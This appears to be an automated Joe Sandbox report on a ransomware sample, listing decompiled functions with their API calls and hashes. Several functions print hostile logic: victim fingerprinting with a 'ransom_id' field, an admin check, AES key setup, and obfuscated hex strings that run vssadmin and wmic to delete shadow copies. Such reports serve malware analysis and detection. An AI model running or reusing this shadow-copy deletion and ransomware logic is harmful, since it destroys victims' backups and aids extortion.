Part of subcall function 00A86640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 00A8667F
Part of subcall function 00A86640: GetLastError.KERNEL32(?,?), ref: 00A8668C
Part of subcall function 00A86640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00A866D8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00A86723
lstrcatW.KERNEL32(00000000,00A90364), ref: 00A8673B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00A86745
lstrcmpW.KERNEL32(?,00A90368,?,?), ref: 00A8677C
lstrcmpW.KERNEL32(?,00A9036C,?,?), ref: 00A86796
lstrcatW.KERNEL32(00000000,?), ref: 00A867A8
lstrcatW.KERNEL32(00000000,00A9039C), ref: 00A867B9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 00A8681D
FindClose.KERNEL32(00003000,?,?), ref: 00A8682E

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: 29fde96e73f3260d21f037d16be97aeb002ceab7e178423c3157a0698be88aa9
Instruction ID: a0bb82d3ea453c69b8961dbabf6284134b6bfe008cdfd2dd1be0a52da91af28e
Opcode Fuzzy Hash: 29fde96e73f3260d21f037d16be97aeb002ceab7e178423c3157a0698be88aa9
Instruction Fuzzy Hash: 76315C71E00219ABDF11FFA4DD89AAE7BB8FF44714F0445A6F809E7150EB319A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A83A60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00A83A60() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x00a83a69
0x00a83a89
0x00a83a90
0x00a83a98
0x00a83aaf
0x00a83abe
0x00a83ac5
0x00a83ac7
0x00a83aca
0x00a83ad6
0x00a83a9d
0x00a83a9d
0x00a83a9d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A83A90
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00A83AA3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A83AAF
FreeSid.ADVAPI32(?), ref: 00A83ACA

Strings

CheckTokenMembership, xrefs: 00A83AA9
advapi32.dll, xrefs: 00A83A9E

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 9765d8cc8897450efdd4a88a67c4d7cd3aab2dd68f5792085a96327f8e0ea8c6
Instruction ID: 2a9b49920ea0f56c8c3ee051c6e1ef537b81fd567aebb5047544d9f966502cd9
Opcode Fuzzy Hash: 9765d8cc8897450efdd4a88a67c4d7cd3aab2dd68f5792085a96327f8e0ea8c6
Instruction Fuzzy Hash: 38F03730A80209BBEF10EBE0DC0EFBEBB7CEB04B01F000584F905E2181E6706A108B55

Uniqueness

Uniqueness Score: -1.00%

Function 00A839B0 Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A839B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
				intOrPtr* _t44;

				_t44 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
				 *(__ecx + 4) = L"pc_user";
				 *(__ecx + 0x10) = L"pc_name";
				 *((intOrPtr*)(__ecx + 0x18)) = 1;
				 *(__ecx + 0x1c) = L"pc_group";
				 *(__ecx + 0x28) = L"av";
				 *(__ecx + 0x34) = L"pc_lang";
				 *(__ecx + 0x40) = L"pc_keyb";
				 *(__ecx + 0x4c) = L"os_major";
				 *(__ecx + 0x58) = L"os_bit";
				 *((intOrPtr*)(__ecx + 0x60)) = 1;
				 *(__ecx + 0x64) = L"ransom_id";
				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
				 *(__ecx + 0x88) = L"ip";
				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
				return _t44;
			}

0x00a839b7
0x00a839b9
0x00a839be
0x00a839c4
0x00a839ca
0x00a839d0
0x00a839d6
0x00a839dc
0x00a839e2
0x00a839e8
0x00a839ef
0x00a839f6
0x00a839fd
0x00a83a04
0x00a83a0b
0x00a83a12
0x00a83a19
0x00a83a20
0x00a83a27
0x00a83a2e
0x00a83a35
0x00a83a3c
0x00a83a42
0x00a83a52
0x00a83a5c

APIs

GetProcessHeap.KERNEL32(?,?,00A84587,00000000,?,00000000), ref: 00A83A4C

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d81ca06250fcbb13de5663f6fa16b81d7ac738ffd97792a0eb92924e7968aac6
Instruction ID: 3e1f420c140bff9b9ff4990cd17b3421b50a7555fc7c9fb797799b08cadc2bd1
Opcode Fuzzy Hash: d81ca06250fcbb13de5663f6fa16b81d7ac738ffd97792a0eb92924e7968aac6
Instruction Fuzzy Hash: 49112AB4501B44CFC7A0DF69C58868ABBF0FB09758B40591DE99A8BB10D3B1F848CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A87EE0 Relevance: .4, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A87EE0(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xa8aa40 + (_t421 >> 0x18) * 4) ^  *(0xa8a640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t421 & 0x000000ff) * 4) ^  *0xa89200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
				_t544 = _t543 ^  *(0xa8ae40 + (_t289 >> 0x18) * 4) ^  *(0xa8aa40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xa8aa40 + (_t422 >> 0x18) * 4) ^  *(0xa8a640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t422 & 0x000000ff) * 4) ^  *0xa89204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xa8ae40 + (_t311 >> 0x18) * 4) ^  *(0xa8aa40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xa8aa40 + (_t423 >> 0x18) * 4) ^  *(0xa8a640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t423 & 0x000000ff) * 4) ^  *0xa89208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xa8ae40 + (_t333 >> 0x18) * 4) ^  *(0xa8aa40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xa8aa40 + (_t424 >> 0x18) * 4) ^  *(0xa8a640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t424 & 0x000000ff) * 4) ^  *0xa8920c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xa8ae40 + (_t355 >> 0x18) * 4) ^  *(0xa8aa40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xa8aa40 + (_t425 >> 0x18) * 4) ^  *(0xa8a640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t425 & 0x000000ff) * 4) ^  *0xa89210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xa8ae40 + (_t377 >> 0x18) * 4) ^  *(0xa8aa40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xa8aa40 + (_t426 >> 0x18) * 4) ^  *(0xa8a640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t426 & 0x000000ff) * 4) ^  *0xa89214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xa8ae40 + (_t399 >> 0x18) * 4) ^  *(0xa8aa40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8a240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xa8aa40 + (_t427 >> 0x18) * 4) ^  *(0xa8a640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa8a240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa8ae40 + (_t427 & 0x000000ff) * 4) ^  *0xa89218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x00a87ee6
0x00a87eea
0x00a87eee
0x00a87ef0
0x00a87ef3
0x00a87ef5
0x00a87ef8
0x00a87efb
0x00a87efe
0x00a87f01
0x00a87f04
0x00a87f07
0x00a87f0a
0x00a87f0d
0x00a87f10
0x00a87f13
0x00a87f16
0x00a87f19
0x00a87f1d
0x00a87f20
0x00a87f23
0x00a87f2e
0x00a87f69
0x00a87f6e
0x00a87f71
0x00a87f77
0x00a87f7c
0x00a87f7f
0x00a87f85
0x00a87f87
0x00a87f8a
0x00a87f8d
0x00a87f93
0x00a87f96
0x00a87f9b
0x00a87fd2
0x00a87fd5
0x00a87fd7
0x00a87fd9
0x00a87fdb
0x00a87fdd
0x00a87fe0
0x00a87fe3
0x00a87fe6
0x00a88026
0x00a8802b
0x00a8802e
0x00a88034
0x00a88039
0x00a8803c
0x00a88042
0x00a88044
0x00a88047
0x00a8804a
0x00a88050
0x00a88053
0x00a88058
0x00a8808f
0x00a88092
0x00a88094
0x00a88096
0x00a88098
0x00a8809a
0x00a8809f
0x00a880a2
0x00a880a5
0x00a880e3
0x00a880e8
0x00a880eb
0x00a880f1
0x00a880f6
0x00a880f9
0x00a880ff
0x00a88101
0x00a88104
0x00a88107
0x00a8810d
0x00a88110
0x00a88115
0x00a8814c
0x00a8814f
0x00a88151
0x00a88153
0x00a88155
0x00a88157
0x00a8815c
0x00a8815f
0x00a88162
0x00a881a0
0x00a881a5
0x00a881a8
0x00a881b1
0x00a881b6
0x00a881b9
0x00a881c2
0x00a881c4
0x00a881c7
0x00a881ca
0x00a881d3
0x00a881d6
0x00a881de
0x00a88215
0x00a88218
0x00a8821a
0x00a8821c
0x00a8821e
0x00a88224
0x00a8822a
0x00a88230
0x00a88232
0x00a88275
0x00a8827a
0x00a8827d
0x00a88286
0x00a8828b
0x00a8828e
0x00a88297
0x00a88299
0x00a8829c
0x00a8829f
0x00a882a8
0x00a882ab
0x00a882b3
0x00a882ea
0x00a882ed
0x00a882ef
0x00a882f1
0x00a882f3
0x00a882f5
0x00a882fd
0x00a88303
0x00a88309
0x00a8834a
0x00a8834f
0x00a88352
0x00a8835b
0x00a88360
0x00a88363
0x00a8836c
0x00a8836e
0x00a88371
0x00a88374
0x00a8837d
0x00a88380
0x00a88388
0x00a883bf
0x00a883c2
0x00a883c4
0x00a883c6
0x00a883c8
0x00a883ca
0x00a883d2
0x00a883d4
0x00a883e5
0x00a883eb
0x00a88425
0x00a88427
0x00a88434
0x00a88436
0x00a8843f
0x00a88443
0x00a88449
0x00a88451
0x00a88457
0x00a88463

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65882d5e69dfe99c488556117f6a2810d4df4d27478f17c18e8b7245aa11c95b
Instruction ID: a8622fe73d54fd40f709aa5000e5eb2c183f91f784a57e1d09096059877e6cf7
Opcode Fuzzy Hash: 65882d5e69dfe99c488556117f6a2810d4df4d27478f17c18e8b7245aa11c95b
Instruction Fuzzy Hash: B912E870A111149FDB08CF69D8909AABBF1FB4D310B4684AFE80ADB391D739AA51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A84330 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A84330(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E00A83AE0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x00a84346
0x00a843e2
0x00a843ec
0x00a843f4
0x00a843fc
0x00a84400
0x00a84408
0x00a8440c
0x00a84414
0x00a84419
0x00a84421
0x00a84429
0x00a84431
0x00a84439
0x00a84441
0x00a84449
0x00a84454
0x00a8445f
0x00a8446a
0x00a84475
0x00a84480
0x00a8448b
0x00a84496
0x00a844a1
0x00a844ac
0x00a844b7
0x00a844c2
0x00a844cd
0x00a8434c
0x00a8434e
0x00a84356
0x00a8435e
0x00a84362
0x00a8436a
0x00a8436e
0x00a84376
0x00a8437e
0x00a84386
0x00a8438e
0x00a84393
0x00a8439b
0x00a843a3
0x00a843ab
0x00a843b3
0x00a843bb
0x00a843c3
0x00a843cb
0x00a843d3
0x00a843d3
0x00a844e6
0x00a844f5
0x00a844f9
0x00a84505
0x00a8450d
0x00a84523
0x00a8452b
0x00a8452d
0x00a844fb
0x00a844fb
0x00a844fb
0x00a84537
0x00a84545

APIs

Part of subcall function 00A83AE0: _memset.LIBCMT ref: 00A83B32
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00A83B56
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00A83B5A
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00A83B5E
Part of subcall function 00A83AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00A83B85

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 00A844EF
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00A84505
lstrcatW.KERNEL32(00000000,0063005C), ref: 00A8450D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00A84523
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A84537

Strings

., xrefs: 00A8437E
b, xrefs: 00A84356
, xrefs: 00A84421
i, xrefs: 00A84376
t, xrefs: 00A8445F
a, xrefs: 00A84431
., xrefs: 00A84400
m, xrefs: 00A843EC
e, xrefs: 00A843CB
a, xrefs: 00A8439B
d, xrefs: 00A84480
e, xrefs: 00A843C3
e, xrefs: 00A843D3
x, xrefs: 00A84386
, xrefs: 00A843BB
, xrefs: 00A8446A
l, xrefs: 00A844AC
\, xrefs: 00A843E2
h, xrefs: 00A84475
open, xrefs: 00A8451C
d, xrefs: 00A84449
, xrefs: 00A84496
l, xrefs: 00A84454
x, xrefs: 00A8440C
c, xrefs: 00A843AB
n, xrefs: 00A84441
w, xrefs: 00A8436E
w, xrefs: 00A8448B
/, xrefs: 00A84419
a, xrefs: 00A844A1
/, xrefs: 00A844B7
s, xrefs: 00A84429
m, xrefs: 00A84362
e, xrefs: 00A844CD
p, xrefs: 00A843B3
o, xrefs: 00A843A3
u, xrefs: 00A844C2
m, xrefs: 00A84439
\, xrefs: 00A8434E
s, xrefs: 00A84393

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 48fe14e851f9cdb0a02b55434a4e35ce94c8d390de0bee5840af0d77f20b8882
Instruction ID: 8c0667046e30f291bcf374f4ed389c2a25b1665f481452cc2650b91369436219
